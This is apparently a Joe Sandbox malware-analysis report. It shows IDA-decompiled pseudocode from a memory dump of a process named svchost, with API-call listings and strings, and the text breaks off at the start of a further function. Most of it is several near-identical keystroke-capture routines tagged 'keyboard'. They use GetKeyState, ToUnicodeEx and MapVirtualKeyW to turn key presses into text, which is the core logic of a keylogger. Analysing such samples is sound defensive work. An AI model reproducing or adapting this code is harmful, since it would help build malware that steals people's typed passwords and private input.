						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8594A, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8594A(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860d0);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85939, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85939(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860c8);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C858C2, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858C2(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc86090);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85917, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85917(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860b8);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C859C1, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C859C1(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc86160);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C858F5, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858F5(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860a8);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C87614, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75
filesleep

C-Code - Quality: 100%

			E00C87614() {
				char _v516;
				intOrPtr _t8;
				intOrPtr _t19;
				void* _t23;
				void* _t25;
				short* _t29;
				char _t30;
				short _t32;
				void* _t35;
